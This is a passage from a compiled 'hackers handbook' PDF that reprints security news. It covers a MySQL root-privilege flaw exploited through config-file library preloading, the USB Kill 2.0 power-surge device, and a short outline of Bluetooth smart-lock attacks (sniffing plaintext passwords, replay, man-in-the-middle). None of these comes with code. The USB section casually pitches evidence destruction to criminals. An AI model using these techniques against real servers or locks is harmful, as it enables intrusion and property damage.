This could result in complete compromise of the server running the affected MySQL

version.

The researcher also warned that the vulnerability could be exploited even if SELinux

or AppArmor Linux kernel security module is enabled with default active policies for

MySQL service on the major Linux distributions.

The flaw actually resides in the mysqld_safe script that is used as a wrapper by

many MySQL default packages or installations to start the MySQL service process.

The mysqld_safe wrapper script is executed as root, and the primary mysqld process

drops its privilege level to MySQL user, Golunski examined.

"If an attacker managed to inject a path to their malicious library within the config,
they would be able to preload an arbitrary library and thus execute arbitrary code
with root privileges when MySQL service is restarted (manually, via a system update,
package update, system reboot, etc.)"

The researcher will soon release details and full exploit code for CVE-2016-6663, the

flaw that allows low-privileged attackers to make exploitation trivial.

NO MYSQL PATCH AVAILABLE YET

Golunski reported the zero-day flaws to Oracle on July 29 and other affected

vendors on July 29.

32
HACKERS HANDBOOK BY SIR WAR10CK

While Oracle acknowledged and triaged the report, scheduling the next Oracle CPUs

for October 18, 2016, MariaDB and PerconaDB patched their versions of the

database software before the end of August.

Since more than 40 days have passed and the two vendors released the patches to

fix the issues, Golunski said he decided to go public with the details of the zero-days.

TEMPORARY MITIGATION:

Until Oracle fixes the problem in its next CPU, you can implement some temporary

mitigations, proposed by the researcher, for protecting your servers.

"As temporary mitigations, users should ensure that no MySQL config files are
owned by the mysql user, and create root-owned dummy my.cnf files that are not in
use," Golunski wrote.

But remember, the above mitigations are just workarounds, so you are advised to

apply vendor patches as soon as they become available.

33
HACKERS HANDBOOK BY SIR WAR10CK

USB KILL V2.0

A proof-of-concept USB prototype that was designed by a Russian researcher, Dark

Purple, last year, to effectively destroy sensitive components of a computer when

plugged in.

Now, someone has actually created the Killer USB stick that destroys almost

anything – such as Laptops, PCs, or televisions – it is plugged into.

A Hong Kong-based technology manufacturer is selling a USB thumb drive

called USB Kill 2.0 that can fry any unauthorized computer it's plugged into by
introducing a power surge via the USB port. It costs$49.95.

34
HACKERS HANDBOOK BY SIR WAR10CK

HOW DOES USB KILL 2.0 WORK?

As the company explains, when plugged in, the USB Kill 2.0 stick rapidly charges its

capacitors via the USB power supply, and then discharges – all in a matter of

seconds.

The USB stick discharges 200 volts DC power over the data lines of the host

machine and this charge-and-discharge cycle is repeated several numbers of times

in just one second, until the USB Kill stick is removed.

"When tested on computers, the device isn't designed or intended to erase data," the
company says. "However, depending on the hardware configuration (SSD [solid-
state drive] vs. platter HDD [hard disk drive]), the drive controllers may be damaged
to the point that data retrieval is impractical.""Any public facing USB port should be
considered an attack vector," the company says in a news release. "In data
security, these ports are often locked down to prevent exfiltration of data or
infiltration of malware, but are very often unprotected against electrical attack."

WHEN AND FOR WHOM USB KILL WOULD

BE USEFUL?
USB Kill stick could be a boon for whistleblowers, journalists, activists, and, not to

forget, cyber criminals, who want to keep their sensitive data away from law

enforcement as well as cyber thieves.

It is like, if you're caught, kill yourself. In the same fashion as terrorists do. Here I

mean to kill the data from your laptop if the law enforcement has caught your laptop.

And USB Kill stick does the same for you.

35
HACKERS HANDBOOK BY SIR WAR10CK

However, the company claims to have developed USB Kill 2.0 stick for the sole

purpose of allowing companies to test their devices against USB Power

Surge attacks and to prevent data theft via "Juice Jacking" attacks.

VIDEO DEMONSTRATION
You can watch the video demonstration below by the company that shows USB Kill

2.0 stick in action.

The company claims about 95% of all devices available on the market today are

vulnerable to power surge attacks introduced via the USB port.

However, the only devices not vulnerable to USB kill attacks are recent models of

Apple's MacBook, which optically isolate the data lines on USB ports.

Juice jacking is a type of cyber attack wherein malware installed on a computer can

surreptitiously copy data from a smartphone, tablet or other computers using a USB

charging port that doubles as a data connection, typically over USB.

While USB Kill 2.0 has been "designed and tested to be safe," the company
warns that the USB stick "is a high-voltage device" and is only meant
for "responsible adults." Also, the company's website "strongly condemns the
malicious use of its products."

36
HACKERS HANDBOOK BY SIR WAR10CK

USB Kill 2.0 also comes with a USB Protection Shield, called Test Shield, sold for
additional $15.70, which is designed to allow testing of the USB Killer stick without

destroying the host machine.

37
HACKERS HANDBOOK BY SIR WAR10CK

HOW TO HACK SMART BLUETOOTH

LOCKS AND IOT DEVICES

become more and more embedded in our daily lives, Bluetooth Low Energy, also

known as Bluetooth Smart or Bluetooth 4, is the leading protocol designed for

connecting IoT devices, medical equipment, smart homes and like most emerging

technologies, security is often an afterthought.

As devices vulnerabilities have real impact on our digital and physical security.

Enter the Bluetooth lock, promising digital key convenience with temporary and

Internet shareable access. The problem is, almost all of these locks have

vulnerabilities, easily exploited via Bluetooth!

38
HACKERS HANDBOOK BY SIR WAR10CK

DEF CON always has the coolest new hacks and security news, and this year was

no exception. The hacking conferences are a great way to get a pulse on the general

status of the security world, what people are interested in, worried about, or looking

to exploit.

This year clearly had an uptick in Internet of Things (IoT) devices and ways to
hack them.

Obviously, we had to go and take a look at the Bluetooth lock hack, and we are not

the only ones.

There were articles in a number of security and general tech sites about how

vulnerable some of these locks are – a shocking 75% of them could be hacked

relatively easily, and one reported to have great security could actually be broken

into with a screwdriver.

The locks were from companies like BlueLock, Kwikset, Noke, August, BitLock, and

QuickLock.

39
 HACKERS HANDBOOK BY SIR WAR10CK

HOW TO HACK A BLUETOOTH LOCK:

There have been a number of different researchers who have tackled this problem,

but Anthony Rose and Ben Ramsay out of Merculite Security did a great job of

thoroughly going through a significant number of them, documenting the hacks and

contacting the manufacturers.

1. Look for plaintext passwords: Many of the locks had passwords but were
simply transmitting them in plaintext. Anyone with a decent Bluetooth
sniffer like Ubertooth and some effort has just owned your password
2. Replay the signal: OK, great you’ve built in awesome encryption and I
can't possibly hope to read and decrypt the signal you just sent to that lock.
But I just capture and replay what you just sent, and the door opens wide.
3. Man in the Middle: Here I am, using one of the many Man in the Middle
tools to sit in the middle of your connection and control everything you're
transmitting to the device. There's *definitely* no way I could change
what you’re transmitting (say, to keep the deadbolt from hearing a "lock"
command).

40
 HACKERS HANDBOOK BY SIR WAR10CK

The great news is that we found a video of Zero_Chaos and Granolocks at

Pwnie Express that show all of this stuff in action and tools you can actually use to

detect these hacks in action.

Locks are not the only Bluetooth devices shown to be vulnerable. Here’s a quick list

of just some of the devices that have already been found vulnerable:
 Cars
 Teakettles and coffee machines
 Medical devices (including implanted ones)
 Fitness trackers
This news should be worrying for people who have invested in a cheap Bluetooth

lock for their convenience, and such attacks could be a real problem just waiting to

happen.

41
HACKERS HANDBOOK BY SIR WAR10CK

42
HACKERS HANDBOOK BY SIR WAR10CK

43